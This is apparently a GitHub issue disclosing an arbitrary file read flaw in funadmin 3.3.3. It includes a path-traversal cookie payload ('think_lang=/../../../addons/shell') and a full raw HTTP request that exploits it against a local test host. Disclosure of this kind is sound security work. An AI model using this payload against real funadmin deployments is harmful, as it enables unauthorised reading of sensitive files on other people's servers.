You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Description:
Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.
replace think_lang=....; with think_lang=/../../../addons/shell;
such as : Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;
Description:
Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.
Vulnerability Type: Arbitrary File Read Vulnerability
Affected component:
app/common/controller/Backend.php
Attack Vectors:
replace
think_lang=....
; withthink_lang=/../../../addons/shell;
such as :
Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;
GET / HTTP/1.1
Host: 127.0.0.1:8022
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1715701691
Connection: close
The text was updated successfully, but these errors were encountered: